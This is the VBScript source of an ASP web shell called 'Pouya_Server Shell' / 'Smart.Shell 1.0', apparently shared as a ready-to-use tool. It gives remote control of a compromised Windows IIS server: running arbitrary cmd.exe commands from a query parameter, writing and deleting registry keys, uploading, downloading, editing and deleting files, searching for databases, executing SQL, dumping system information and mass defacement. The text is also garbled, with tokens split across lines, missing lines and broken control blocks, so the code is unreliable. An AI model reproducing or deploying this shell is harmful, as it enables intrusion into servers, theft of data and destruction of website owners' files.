Pouya

<%@ LANGUAGE = VBScript.
Encode%>
<%//**Start Encode
On Error Resume Next
Dim myFSO,showdisks
Set myFSO = CreateObject ("Scripting.FileSystemObject")
showdisks=FALSE
Server.ScriptTimeOut = 7200
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.I
tem(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteStrin
g("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Conten
t-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))
)
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd
-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("fi
lename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString
(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin,
nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFil
eName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Cont
ent-Type:"))
nPosEnd = InstrB(nPosBegin, biData, CByteString(
Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biDat
a, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds)
- 2
oUploadFile.FileData = MidB(biData, nPosBegin, n
PosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase
(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13))
)
nPosEnd = InstrB(nPosBegin, biData, vDataBounds)
- 2
If Not mcolFormElem.Exists(LCase(sInputName)) Th
en mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosE
nd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds)
, biData, vDataBounds)
Loop
End Sub
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))
)
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
For nIndex = 1 to LenB(FileData)
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
Next
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
startcode = "<html><head><title>.:: Pouya_Server Shell ::.</title></head><body>"
endocde = "</body></html>"
onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.programme
r.ir"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
Function HexConv(hexVar)
Dim hxx, hxx_var, multiply
IF hexVar <> "" THEN
hexVar = UCASE(hexVar)
hexVar = StrReverse(hexVar)
DIM hx()
REDIM hx(LEN(hexVar))
hxx = 0
hxx_var = 0
FOR hxx = 1 TO LEN(hexVar)
IF multiply = "" THEN multiply = 1
hx(hxx) = mid(hexVar,hxx,1)
hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
multiply = (multiply * 16)
NEXT
hexVar = hxx_var
HexConv = hexVar
END IF
End Function
cprthtml = "<font face='arial' size='1'>.:: Smart.Shell 1.0 © BY <a href='m
ailto:'>P0uY@</a> - <a href='' target='_blank'>_$3r\/3R</a> ::.</font>"
Function get_hxno(ghx)
If ghx = "A" Then
ghx = 10
ElseIf ghx = "B" Then
ghx = 11
ElseIf ghx = "C" Then
ghx = 12
ElseIf ghx = "D" Then
ghx = 13
ElseIf ghx = "E" Then
ghx = 14
ElseIf ghx = "F" Then
ghx = 15
End If
get_hxno = ghx
End Function
keydec="<font face='arial' size='1'>.:: Smart.Shell 1.0 © BY <a href='mailt
o:'>P0Uy@_$3r\/3R</a> - <a href='' target='_blank'></a> ::.</font>"
Function showobj(objpath)
showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
End Function
Function showobjpath(objpath)
showobjpath = Left(objpath,InstrRev(objpath,"\"))
End Function
Function checking(a,b)
' If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then
' pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Req
uest.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_N
AME"))) & "?action=error"
' Response.Redirect(pagina)
' End If
End Function
Sub hdr()
Response.Write startcode
Response.Write keydec
Response.Write "<br>"
End Sub
sub araBul(path_,ara_)
on error resume next
If Len(path_) > 0 Then
cur = path_&"\"
If cur = "\\" Then cur = ""
parent = ""
If InStrRev(cur,"\") > 0 Then
parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
End If
Else
cur = ""
End If
Set f = myFSO.GetFolder(cur)
Set fc = f.Files
For Each f1 In fc
if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
downStr = "<font face=webdings size=5><a href='"& Reques
t.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(f1.path,"\
","|") &"'>Í</a></font>"
if lcase(ara_)="mdb" then
Response.Write downStr&"<font face=wingdings siz
e=5><a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=del&path=" & Re
place(f1.path,"\","|") & "'>û</a></font> * <a href='"& Request.ServerVariables("SC
RIPT_NAME") &"?action=search&status=7&path="&f1.path&"'>"& f1.path &" ["&f1.size
&"]"&"</a></b><br>"
else
Response.Write downStr&"<font face=wingdings siz
e=5><a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=del&path=" & Re
place(f1.path,"\","|") & "'>û</a><a href='"& Request.ServerVariables("SCRIPT_NAME"
) & "?action=txtedit&file=" & Replace(f1.path,"\","|") &"'>!</a></font> - <a hre
f='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=5&path="&f1
.path&"'>"& f1.path &" ["&f1.size&"]</a></b><br>"
end if
end if
Next
Set fs = f.SubFolders
For Each f1 In fs
araBul f1.path,ara_
Next
Set f = Nothing
Set fc = Nothing
Set fs = Nothing
end sub
Sub showcontent()
showdisks=TRUE
Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Reques
t.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PA
TH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br
></font>"
If Trim(Request.QueryString("raiz")) = "root" Then
Set fs=Server.Createobject("Scripting.FileSystemObject")
Set drivecollection=fs.drives
Response.Write "<font face=""arial"" size=""2"">"
For Each drive IN drivecollection
str=drive.driveletter & ":"
Response.Write "<b><a href=""" & Request.ServerVariables
("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
Select Case drive.DriveType
Case 0
tipodrive = "Unknown"
nomedrive = drive.VolumeName
Case 1
tipodrive = "Removable"
If drive.isready Then
Else
nomedrive = ""
End If
Case 2
tipodrive = "Fixed"
Else
nomedrive = ""
End If
Case 3
tipodrive = "Network"
nomedrive = drive.ShareName
Else
nomedrive = ""
End If
Case 4
tipodrive = "CD-Rom"
Else
nomedrive = ""
End If
Case 5
tipodrive = "RAM Disk"
Else
nomedrive = ""
End If
End Select
response.write "<b>Type:</b> " & tipodrive & "<br>"
response.write "<b>Name: </b>" & nomedrive & "<br>"
response.write "<b>File System: </b>"
set sp=fs.getdrive(str)
response.write sp.filesystem & "<br>"
Else
response.write "-<br>"
End If
Response.Write "<b>Disk Space: </b>"
freespace = (drive.AvailableSpace / 1048576)
response.write(Round(freespace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<b>Total Space: </b>"
totalspace = (drive.TotalSize / 1048576)
response.write(Round(totalspace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<br>"
Next
Response.Write "</font>"
Set fs = Nothing
Set drivecollection = Nothing
set sp=Nothing
Else
If Trim(Request.QueryString("raiz")) = "" Then
caminho = Server.MapPath(Request.ServerVariables("SCRIPT
_NAME"))
pos = Instr(caminho,"\")
pos2 = 1
While pos2 <> 0
If Instr(pos + 1,caminho,"\") <> 0 Then
pos = Instr(pos + 1,caminho,"\")
Else
pos2 = 0
End If
Wend
raiz = Left(caminho,pos)
Else
raiz = trim(Request.QueryString("raiz")) & "\"
End If
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(raiz)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "<font face='arial' size='1'><a href=""#"" onclic
k=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?act
ion=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,hei
ght=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font>
<br><br>"
ion=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,heig
ht=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font
><br><br>"
ion=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scr
ollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'>"
Response.Write "<a href=""#"" onclick=""javascript:document.open
('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=450,
height=200,scrollbars=YES,resizable')"">PROMPT</a>"
Response.Write " - <a href=""#"" onclick=""javascript:document.o
pen('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=
760,height=450,scrollbars=YES,resizable')"">SYS INFO</a>"
pen('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=5
50,height=200,scrollbars=YES,resizable')"">REGEDIT</a>"
pen('" & Request.ServerVariables("SCRIPT_NAME") & "?action=search&path=" & Repla
ce(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')""
>SEARCH</a>"
pen('" & Request.ServerVariables("SCRIPT_NAME") & "?action=sqlserver', 'win1','w
idth=550,height=150,scrollbars=YES,resizable')"">EXECUTE SQL</a>"
pen('" & Request.ServerVariables("SCRIPT_NAME") & "?action=about', 'win1','width
=550,height=250,scrollbars=YES,resizable')"">ABOUT</a>"
Response.Write "</font><br><br>"
Response.Write "<font face='arial'><b>Root Folder: " & raiz & "<

/b></font><br><br>"
If CInt(Len(raiz) - 1) <> 2 Then
barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\"))
- 1
backlevel = Left(raiz,barrapos)
Response.Write "<font face='arial' size='2'><b><DIR&g
t;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "
'> . . </font></b></a><br>"
Else
Response.Write "<font face='arial' size='2'><b><DIR&g
t;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . . <
/font></b></a><br>"
End If
Response.Write "<table border=""0"" cellspacing=""0"" cellpaddin
g=""0"" >"
for each folderItem in ColFolders
Response.Write "<tr><td><font face='arial' size='2'><b>&
lt;DIR> <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & fold
erItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseli
ne'>  <font face='arial' size='1'><a href=""#"" onclick=""javascript:d
ocument.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" &
Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=
YES,resizable')""><< PUT</a></font></td>"
Response.Write "<td valign='baseline'>  <font
face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Requ
est.ServerVariables("SCRIPT_NAME") & "?action=fcopy&path=" & Replace(folderItem.
path,"\","|") & "', 'win1','width=400,height=100,scrollbars=YES,resizable')"">&l
t;< Copy/Move</a></font></td>"
Response.Write "<td valign='baseline'>  <font
face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Requ
est.ServerVariables("SCRIPT_NAME") & "?action=fdel&path=" & Replace(folderItem.p
ath,"\","|") & "', 'win1','width=400,height=150,scrollbars=YES,resizable')"">&lt
;< Delete</a></font></td></tr>"
next
Response.Write "</table><br><table border=""0"" cellspacing=""0"
" cellpadding=""0"" >"
marcatabela = true
for each FilesItem0 in ColFiles0
If marcatabela = true then
corfundotabela = " bgcolor=""#EEEEEE"""
Else
corfundotabela = ""
End If
Response.Write "<tr><td" & corfundotabela & "><font face
='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'"
& corfundotabela & "><font face='arial' size='1'>  " & FormatNumber(F
ilesItem0.size/1024, 0) & " Kbytes   </font></td><td valign=
'baseline'" & corfundotabela & ">  <font face='arial' size='1'><a href
=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_N
AME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','wid
th=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign
='baseline'" & corfundotabela & ">    <font face='arial' siz
e='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariab
les("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "'
, 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></
td><td valign='baseline'" & corfundotabela & ">    <font fac
e='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request
.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,
"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o
</a></font></td><td valign='baseline'" & corfundotabela & ">   &n
bsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open
('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace
(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resi
zable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&n
bsp;   <font face='arial' size='1'><a href=""#"" onclick=""javasc
ript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedi
t&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,s
crollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & cor
fundotabela & ">    <font face='arial' size='1'><a href="""
& Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(Fi
lesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td><td valign='baseline'"
& corfundotabela & ">    <font face='arial' size='1'><a targ
et='opener' href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=filecop
y&file=" & Replace(FilesItem0.path,"\","|") & """>o.FileCopy.o</a></font></td></
tr>"
marcatabela = NOT marcatabela
next
Response.Write "</table>"
End If
End Sub
Select Case Trim(Request.QueryString("action"))
Case "get"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NA
ME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br>
<br>File: <b>" & caminho & "</b><br>Copied to: " & destino
End If
Case "put"
Call hdr()
If Trim(Request.QueryString("arquivo")) = "" Then
caminho = Left(Server.MapPath(Request.ServerVariables("S
CRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\
"))
varpath = Trim(Request.QueryString("path"))
Set MonRep = ObjFSO.GetFolder(caminho)
Response.Write "<font face='arial' size='2'><b>Select Fi
le: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
for each FilesItem0 in ColFiles0
Response.Write "<tr><td><font face='arial' size=
'2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='ar
ial' size='1'>  " & FormatNumber(FilesItem0.size/1024, 0) & " Kby
tes   </font></td><td valign='baseline'>  <font face='a
rial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=p
ut&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SE
LECT ::</a></font></td></tr>"
next
Response.Write "</table>"
Else
destino = Replace(Trim(Request.QueryString("path")),"|",
"\") & "\"
arquivo = Replace(Trim(Request.QueryString("arquivo")),"
|","\")
Set MyFile = ObjFSO.GetFile(arquivo)
MyFile.Copy (destino)
Response.Write "<font face='arial' size='2'><cen
ter><br><br>File: <b>" & arquivo & "</b><br>Copied to: <b>" & destino
End If
End If
Case "del"
Call hdr()
MyFile.Delete
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.ope
ner.document.location.reload();</SCRIPT>"
<br>Folder <b>" & caminho & "</b> Deleted.<br>"
End If
Case "fdel"
Call hdr()
ObjFSO.DeleteFolder caminho
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.ope
ner.document.location.reload();</SCRIPT>"
<br>File <b>" & caminho & "</b> Deleted.<br>"
End If
Case "ren"
Call hdr()
If Trim(Request.QueryString("status")) <> "2" Then
caminho = Replace(Trim(Request.QueryString("path")),"|",
"\")
arquivo = showobj(caminho)
Response.Write "<br><font face=""arial"" size=""2""><b>"
& arquivo & "</b><br>" & _
"<form action=""" & Reque
st.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
"<input type=""hidden"" n
ame=""action"" value=""ren"">" & _
ame=""status"" value=""2"">" & _
ame=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
"New Name: <input type=""
text"" name=""newname"">" & _
"  <input type=
""submit"" value=""Submit"">" & _
"</form>"
Else
caminho = Replace(Trim(Request.QueryString("path")),"|",
"\")
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Req
uest.QueryString("newname"))
MyFile.Move (destino)
Response.Write "<font face='arial' size='2'><cen
ter><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">
self.opener.document.location.reload();</SCRIPT>"
End If
End If
Case "error"
Response.Write "<center><font face='arial' size='2' color='red'>
<b>CÓDIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
Case "cmd"
Call hdr()
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.QueryString(".CMD")
If (szCMD <> "") Then
szTempFile = "c:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTemp
File, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False,
0)
End If
Response.Write "<FORM action=""" & Request.ServerVariables("URL"
) & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><inp
ut type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit va
lue=""Run""></FORM><br><br> "
If (IsObject(oFile)) Then
Response.Write "<font face=""arial"">"
Response.Write Replace(Replace(Server.HTMLEncode(oFile.R
eadAll),VbCrLf,"<br>")," "," ")
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
Case "info"
Call hdr()
Set WshNetwork = Server.CreateObject("WScript.Network")
Set WshShell = Server.CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("SYSTEM")
Response.Write "<br><font face=arial size=2>"
Response.Write "<b>User Properties:</b><br>"
Response.Write "<b>UserName: </b>" & WshNetwork.UserName & "<br>
"
Response.Write "<b>Computer Name: </b>" & WshNetwork.ComputerNam
e & "<br>"
Response.Write "<b>User Domain: </b>" & WshNetwork.UserDomain &
"<br>"
Set Drives = WshNetwork.EnumNetworkDrives
For i = 0 to Drives.Count - 1
Response.Write "<b>Drive de Rede (Mapeado): </b>" & Driv
es.Item(i) & "<br>"
Next
Response.Write "<br><b>Cpu Information:</b><br>"
Response.Write "<b>Processor Architecture: </b>" & WshEnv("PROCE
SSOR_ARCHITECTURE") & "<br>"
Response.Write "<b>Number Of Processors: </b>" & WshEnv("NUMBER_
OF_PROCESSORS") & "<br>"
Response.Write "<b>Processor Identifier: </b>" & WshEnv("PROCESS
OR_IDENTIFIER") & "<br>"
Response.Write "<b>Processor Level: </b>" & WshEnv("PROCESSOR_LE
VEL") & "<br>"
Response.Write "<b>Processor Revision: </b>" & WshEnv("PROCESSOR
_REVISION") & "<br>"
Response.Write "<br><b>Operating System Information:</b><br>"
Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_AD
DR") & "<br>"
Response.Write "<b>Sistem OS: </b>" & WshEnv("OS") & "<br>"
Response.Write "<b>Server Software: </b>" & request.servervariab
les("SERVER_SOFTWARE") & "<br>"
Response.Write "<b>Cmd Path: </b>" & WshShell.ExpandEnvironmentS
trings("%ComSpec%") & "<br>"
Response.Write "<b>Public Paths: </b>" & WshEnv("PATH") & "<br>"
Response.Write "<b>Executables: </b>" & WshEnv("PATHEXT") & "<br
>"
Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironm
entStrings("%SYSTEMDRIVE%") & "<br>"
Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironme
ntStrings("%SYSTEMROOT%") & "<br>"
Response.Write "<b>System32 Path: </b>" & WshShell.CurrentDirect
ory & "<br>"
Set Drives = Nothing
Set WshNetwork = Nothing
Set WshShell = Nothing
Set WshEnv = Nothing
Case "reg"
Call hdr()
Set WshShell = Server.CreateObject("WScript.Shell")
Response.Write "<font face=""arial"" size=""2""><br><b>Registry
Editor:</b><br><br>"
Select Case Trim(Request.QueryString("regaction"))
Case "w"
If Trim(Request.QueryString("process")) = "yes"
Then
Select Case Trim(Request.QueryString("ty
pe"))
Case "1"
teste = WshShell.RegWrit
e (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ
")
Case "2"
e (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "
REG_DWORD")
Case "3"
e (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "
REG_BINARY")
Case "4"
e (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EX
PAND_SZ")
Case "5"
e (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MU
LTI_SZ")
End Select
Response.Write "<center><br><font face="
"arial"" size=""2"">Registry <b>"
Response.Write Trim(Request.QueryString(
"key")) & "</b> Changed.</center>"
Response.Write "<br><br><font face=""ari
al"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=
reg"">Main Menu</a><br>"
Else
Response.Write "<table><tr><td><font fac
e=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABR
EVIAÇÃO</td></tr>"
Response.Write "<tr><td><font face=""ari
al"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU
</td></tr>"
al"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKL
M </td></tr>"
al"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR
</td></tr>"
al"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS
</td></tr>"
al"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HK
EY_CURRENT_CONFIG </td></tr></table><br>"
e=""arial"" size=""2"">Type </td><td><font face=""arial"" size=""2""> Descriptio
n </td><td><font face=""arial"" size=""2""> Figure </td></tr>"
al"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> String </td><td
><font face=""arial"" size=""1""> String </td></tr>"
al"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> Number </td>
<td><font face=""arial"" size=""1""> DWORD </td></tr>"
al"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> Binary </td
><td><font face=""arial"" size=""1""> VBArray DWORD </td></tr>"
al"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> String E
xpand (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> Str
ing </td></tr>"
al"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> Array Of
Strings </td><td><font face=""arial"" size=""1""> VBArray Of Strings </td></tr><
/table>"
Response.Write "<br><br><FORM action="""
& Request.ServerVariables("URL") & """ method=""GET"">"
e=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font fa
ce=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\ProductId )</td></tr>"
al"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
al"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
Response.Write "<OPTION VALUE=""1"">REG_
SZ </option>"
DWORD </option>"
BINARY </option>"
EXPAND_SZ </option>"
MULTI_SZ </option></select><br>"
Response.Write "<input type=""hidden"" n
ame=""regaction"" value=""w"">"
ame=""action"" value=""reg"">"
ame=""process"" value=""yes""></td></tr>"
Response.Write "<tr><td></td><td><input
type=""submit"" value=""OK""></form></td></tr></table>"
Response.Write "<br><br><font face=""ari
al"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=
reg"">Main Menu</a><br>"
End If
Case "r"
Then
Response.Write "<font face=""arial"" siz
e=""2"">" & Trim(Request.QueryString("key")) & "<br>"
Response.Write "Value: <b>" & WshShell.R
egRead (Trim(Request.QueryString("key")))
Else
Response.Write "<FORM action=""" & Reque
st.ServerVariables("URL") & """ method=""GET"">"
e=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microso
ft\Windows\CurrentVersion\ProductId )<br>"
ame=""regaction"" value=""r"">"
ame=""process"" value=""yes"">"
Response.Write "<input type=""submit"" v
alue=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" siz
e=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Ma
in Menu</a><br>"
Case "d"
Then
teste = WshShell.RegDelete (Trim(Request
.QueryString("key")))
Response.Write "Chave <b>" & Trim(Reques
t.QueryString("key")) & " </b>Deleted."
Else
Response.Write "<FORM action=""" & Reque
st.ServerVariables("URL") & """ method=""GET"">"
e=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\W
indows\CurrentVersion\ProductId )<br>"
ame=""regaction"" value=""d"">"
ame=""process"" value=""yes"">"
alue=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" siz
e=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Ma
in Menu</a><br>"
Case Else
Response.Write "<font face=""arial"" size=""1"">
<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"
">WRITE VALUE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVari
ables("SCRIPT_NAME") & "?action=reg&regaction=r"">READ VALUE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVari
ables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETE KEY</a><br>"
End Select
Set WshShell = Nothing
Case "txtview"
Call hdr()
Response.Write copyright & onlinehelp & "<font face=""arial"" si
ze=""2"">"
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCr
Lf,"<br>")," "," ")
Set a = Nothing
Set fso = Nothing
Case "txtedit"
Call hdr()
If Request.Form.Count = 0 Then
file = Replace(Trim(Request.QueryString("file")),"|","\"
)
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write "<form method=""post"" action=""" & Reque
st.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<textarea cols='85' rows='25' name=""con
tent"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
Response.Write "<input type=""hidden"" name=""path"" val
